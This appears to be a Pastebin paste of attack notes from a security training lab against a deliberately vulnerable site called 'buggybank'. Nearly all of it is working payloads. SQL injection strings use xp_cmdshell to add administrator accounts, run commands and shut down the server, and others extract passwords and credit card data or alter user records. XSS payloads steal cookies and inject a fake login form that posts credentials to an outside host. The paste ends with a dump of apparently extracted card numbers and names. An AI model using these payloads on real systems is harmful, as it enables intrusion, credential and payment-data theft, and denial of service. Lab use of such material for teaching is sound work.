Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1/1/08 ' exec master..xp_cmdshell “net user paul noddy /ADD”; --
- 1/1/08 ' exec master..xp_cmdshell “net localgroup administrators paul /ADD”; --
- 1/1/08 ' exec master..xp_cmdshell "I am really bad at this > c:\sam.txt" -- '
- 1/1/08 ' exec master..xp_cmdshell "type c:\sam.txt" --
- ' union select null," code", " expirydate", " cardnumber", "cardname" from creditcard order by 4--
- ' exec master..xp_cmdshell "net localgroup administrators Robot /ADD"; --
- ' exec master..xp_cmdshell "type readme.txt"; --
- ' exec master..xp_cmdshell "dir C:\inetpub\wwwroot\buggybank\ > sam3.txt"; --
- ' exec master..xp_cmdshell "type RobotPoop.txt"; --
- \domains\buggybank.cave\wwwroot\
- ' exec master..xp_cmdshell "Copy sam3.txt C:\inetpub\wwwroot\buggybank\sam3.txt*"; --
- ' exec master..xp_cmdshell "Copy C:\inetpub\wwwroot\buggybank\xfer.asp C:\inetpub\wwwroot\buggybank\robotpoop3.txt*"; --
- Denial of Service
- 1/1/08 ' shutdown with nowait; --
- At the login prompt - data loss ...
- x ' or 1=1--
- 1 ' or 1=convert (int,(select top 1 cardname from creditcard))--
- 1 ' or 1=convert (int,(@@version))--
- at the url input line..
- http://cave.buggybank.org/login.asp?username=' or 1=1--&account=9999
- http://cave.buggybank.org/login.asp?username=' having 1=1--&account=9999
- error based blind sql injection
- ' or 1=1--
- ' having 1=1--
- ' group by userinfo.username having 1=1--
- ' group by userinfo.username,userinfo.password having 1=1--
- 1'; insert into userinfo values('noddy1','noddy1')--
- 1'; update userinfo set password='noddy1'--
- 1'; delete from userinfo where usermame='noddy1'--
- o' or username like 'st%'--
- o' or username like 'd%'-- (then de, dem, demo)
- 1' or 1 = convert(int,@@version)--
- 1' or 1 = convert(int,@@servername)--
- 1' or 1 = convert(int,(db_name()))--
- 1' or 1 = convert(int,(user_name()))--
- 1' or 1=convert(int,(select top 1 password from userinfo))--
- 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('me')))--
- 1' or 1=convert(int,(select password from userinfo where username=('me')))--
- 1' or 1=convert(int,(select top 1 cardnumber from creditcard))--
- 1' or 1=convert(int,(select top 1 cardname from creditcard))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))-- ...then
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
- table_name not in ('REFERENTIAL_CONSTRAINTS','CreditCard','dtproperties','sysalternates','sysconstraints')))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
- table_name not in ('REFERENTIAL_CONSTRAINTS','%20hidden','dtproperties','sysalternates','sysconstraints')))--
- ' union select null, null, null, null, column_name from information_schema.columns where table_name = '%20hidden' --
- ' union select null, null, null, null, name from sysCOLUMNS --
- ' union select null from userinfo--
- ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
- ' union select null, null, null, null, column_name from information_schema.columns where table_name = 'creditcard' --
- ' union select null, null, null, null, count (*) from userinfo order by 5 --
- ' union select null, table_name, table_type, null, null from information_schema.tables --
- ' union select null,null,null,null, password from userinfo--
- ' union select null,null,null,null, username from userinfo--
- ' union select null,null,null,username, password from userinfo--
- Cross site script attacks
- <script>alert("VULNERABLE");</script>
- <script>document.location="http:\\www.malwarebytes.com";</script>
- <script>alert(document.cookie);</script>
- <a href=#onclick="document.location='http://www.malwarebytes.com?cookie='+escape(document.cookie)">click for free money</a>
- <iframe src="http://www.malwarebytes.com height="0" width="0"></iframe>
- Student is to research adding a form to a page - the solution is below...
- <script>window.onload=function(){document.getElementByID('hakcme').innerHTML ='<p>Please enter your buggybank username & password to login as admin</p><form method="get" action="http://www.malwarebytes.com">Username:<input type="text" name="username"/><br/>Password:<input type="password" name="passwors"/><br/><p><input type="submit" value="Login"/><p/></form>';};</script>
- Wireshark filters
- Display
- ip.src==10.5.11.1
- ip.src!=10.5.11.1
- ip.dst==
- http&&ip.src==
- tcp.port eq 80
- tcp contains 01:01:04
- snmp||dns||icmp
- ip.addr==
- decnet
- lat
- capture filters
- tcp dst port #
- ip src host #
- src port range #-#
- not icmp
- src host # and not dst net #/16
- ether proto \icmp
- no broadcast
- The Antikythera mechanism: The worlds oldest computer !
- 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('darren1','buggyboy','joker','demo','a','valus','alex','tony','me')))--
- ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
- 1125 4/8/2009 5108136656984175 Darren
- 1212 6/6/2014 43212255682521 Darren
- 1252 1/3/2014 43226587025400 Darren
- 1564 12/16/2009 6011002966567565 Darren
- 1568 9/9/2010 34565489474498 Darren
- 1657 12/4/2009 372407135137716 Darren
- 2364 9/8/2016 43556997816587 Darren
- 3456 12/12/2008 4800124627272269 Darren
- 3654 9/14/2013 34567789911235 Darren
- 4452 5/7/2009 5108132733652677 Darren
- 4468 8/18/2016 43221155547782 Darren
- 4486 5/5/2009 4673817253379452 Darren
- 4564 6/14/2012 43551126878954 Darren
- 4695 7/18/2014 34568897554889 Darren
- 5448 4/18/2011 43215484568798 Darren
- 5448 5/17/2011 43115877795246 Darren
- 5644 7/6/2011 34567874466884 Darren
- 5648 9/18/2010 6011008517179267 Darren
- 6411 3/4/2014 43659996571009 Darren
- 6486 7/6/2014 34569987554422 Darren
- 6878 9/19/2014 43556887774411 Darren
- 7655 2/2/2015 34561125548282 Darren
- 7897 8/17/2011 34561158889842 Darren
- 7952 5/24/2014 34567789428856 Darren
- 8410 9/28/2016 43221598735987 Darren
- 8871 4/18/2014 43698774563125 Darren
- 9028 4/4/2015 34566332158778 Darren
- 9542 4/8/2009 372861489856783 Darren
- 9544 3/22/2014 34567165484519 Darren
- 9878 4/18/2012 43556987458899 Darren
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement